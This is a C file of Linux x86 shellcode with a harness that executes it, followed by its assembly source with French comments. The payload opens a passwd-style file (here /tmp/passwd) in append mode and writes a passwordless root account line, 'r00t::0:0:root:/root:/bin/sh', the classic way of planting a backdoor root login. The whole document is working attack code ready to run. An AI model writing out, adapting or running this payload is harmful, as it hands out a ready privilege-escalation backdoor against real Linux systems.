unsigned char shellcode[] = 
"\xeb\x2f\x5e\x31\xc0\x89\xc3\x89\xc1\x89\xc2\x8d\x1e\x83\x6e\x0b\x41"
"\x66\xba\xa4\x01\x66\xb9\x42\x0c\xb0\x05\xcd\x80\x8d\x4e\x0c\x89\xc3"
"\x31\xc0\xb0\x04\x89\xc2\xb2\x1c\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xcc"
"\xff\xff\xff\x2f\x74\x6d\x70\x2f\x70\x61\x73\x73\x77\x64\x41\x72\x30"
"\x30\x74\x3a\x3a\x30\x3a\x30\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
"\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a";

int main() {
    void (*f)();
    f = (void *) shellcode;
    printf("%d\n", strlen(shellcode));
    f();
}
/*
.globl cbegin
.globl cend

cbegin:
	jmp fincode

function:
	pop 	%esi

	xorl	%eax, %eax
	mov		%eax, %ebx
	mov		%eax, %ecx
	mov		%eax, %edx

# recuperation de la chaine, et troncature
	leal	(%esi), %ebx 
	sub		$0x41, 0x0b(%esi)

# dx contient les modes .... ( 0644)
	mov		$0x01a4, %dx
# cx contient les flags (O_CREAT | O_APPEND | O_NONBLOCK, | O_RDWR)
	mov		$0x0c42, %cx
# syscall $0x05
	mov 	$0x5, %al 
	int		$0x80

# suite a l'interuption, on a dans %eax le descripteur

	leal	0x0c(%esi), %ecx
	mov		%eax, %ebx
	xorl	%eax, %eax
	mov		$0x4, %al 
	mov		%eax, %edx
	mov		$0x1c, %dl
	int		$0x80

# _exit(0) 

	xorl	%eax, %eax
	inc		%eax
	int		$0x80

fincode:
	call function
	.string "/tmp/passwdAr00t::0:0:root:/root:/bin/sh\n"
cend:
*/